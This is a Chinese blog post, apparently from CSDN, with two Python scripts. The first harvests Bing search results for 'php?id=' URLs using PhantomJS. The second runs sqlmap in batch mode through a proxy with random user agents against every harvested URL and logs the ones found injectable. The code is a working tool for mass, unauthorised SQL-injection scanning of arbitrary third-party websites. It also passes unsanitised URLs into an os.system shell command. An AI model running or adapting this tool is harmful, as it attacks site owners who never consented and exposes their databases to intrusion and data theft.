抓取bing搜索的页面链接demo代码

本文介绍了一种利用PhantomJS浏览器自动化工具和SQLMap框架进行大规模自动化SQL注入检测的方法。通过生成随机搜索词,该方法在Bing搜索引擎中查找潜在的SQL注入点,并使用多线程技术同时运行多个SQLMap实例进行深入检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

# from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait  # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC  # available since 2.26.0
from selenium.webdriver.phantomjs.webdriver import WebDriver
from selenium.webdriver.common.keys import Keys
import  time
from pyquery import PyQuery as pq
import random
import thread
import  sqlmapBat

def bingSearch():
    id = str(random.randint(0, 9999))

    # Create a new instance of the Firefox driver
    driver = WebDriver(executable_path='c:\phantomjs.exe', port=5001)

    # go to the google home page
    driver.get("https://cn.bing.com/")
    WebDriverWait(driver, 20).until(EC.title_contains("Bing"))
    time.sleep(5)
    print(driver.title)

    # find the element that's name attribute is q (the google search box)
    inputElement = driver.find_element_by_id("sb_form_q")

    inputElement.send_keys("php?id="+id)
    # inputElement.send_keys("php?id=sss site:zte.com.cn  inurl:sss.txt"  )

    searchBtn = driver.find_element_by_id("sb_form_go")
    time.sleep(5)
    searchBtn.click()
    # inputElement.send_keys(Keys.ENTER)
    time.sleep(5)
    # submit the form (although google automatically searches now without submitting)
    # inputElement.submit()

    try:
        # b_results > li.b_pag > nav > ul > li:nth-child(2) > a
        # we have to wait for the page to refresh, the last thing that seems to be updated is the title
        WebDriverWait(driver, 20).until(EC.title_contains("php"))
        # WebDriverWait(driver,10)

        print(driver.title)
        print(driver.get_cookies())
        doc = pq(driver.page_source)
        time.sleep(3)
        for index in range(1,10):
            jq = "#b_results > li:nth-child(" + bytes(index) + ") > h2 > a"
            it =doc(jq)
            print (it.attr('href'))
            bingHref = it.attr('href')
            if  bingHref:
                thread.start_new(sqlmapBat.sqlmapInjectCheck, (it.attr('href'),))
    except:
        print('ssss')
        pass
    finally:
        driver.quit()


if __name__ == "__main__":
    for index  in range(1,100000,1):
        try:
            bingSearch()
        except:
            pass

        time.sleep(30)





 

 

# -*- coding: utf-8 -*-
import  os
import  time

# --proxy=http://proxynj.zte.com.cn:80

sqlInjectSuccLogFile = 'c:\\sqlInjectSuccUrl.txt'

def sqlmapInjectCheck(url):

    logName = 'c:\log_'  + '_'  + str(int(time.time())) + '.txt'
    # --flush - session

    try:
        cmd = 'C:\Python27\python.exe C:\Python27\sqlmap\sqlmap.py --random-agent --proxy=http://proxynj.zte.com.cn:80   --batch --dbms=mysql ' + '-u ' + url +    '|  c:\\tee.exe   ' + logName
        os.system(cmd)
        result = checkSqlInResult(logName)
        if  result == 'succ':
            writeInjectPointUrlToSuccLog(url)
    except:
        pass


def writeInjectPointUrlToSuccLog(url):
    with open(sqlInjectSuccLogFile, 'a+') as file_to_read:
        file_to_read.write(url + '\r\n')


def checkSqlInResult(filename):
    injectSuccStr = 'the following injection point'
    with open(filename, 'r') as file_to_read:
        file_context  =file_to_read.read()
        xx=0
        if file_context.find(injectSuccStr) != -1:
            return 'succ'
    return  ''


if __name__ == "__main__":
    pass
    # sqlmapInjectCheck('https://www.sjq.cn/article.php?id=2')
    # sqlmapInjectCheckAndAnaResult('http://10.42.43.10/low.php?id=1')

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值